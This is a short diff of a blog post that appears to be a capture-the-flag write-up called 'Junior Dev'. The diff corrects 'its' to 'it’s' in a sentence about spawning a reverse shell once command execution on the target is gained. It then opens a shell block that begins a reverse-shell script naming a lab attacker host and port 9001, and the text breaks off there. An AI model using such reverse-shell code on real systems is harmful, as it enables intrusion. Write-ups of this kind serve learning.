r0b0tG4nG/r0b0tg4ng.github.io/_posts/2021-11-27-Junior Dev.md

 ![image](https://user-images.githubusercontent.com/67085453/143765761-0e7da699-8773-49fa-8df6-e511967f33a7.png)<br>

-Now  that we can execute commands on the target, its time to spawn a reverse shell.
+Now  that we can execute commands on the target, it’s time to spawn a reverse shell.
 Below is the script I used.
 ```shell
 String host="10.66.67.114";
 int port=9001;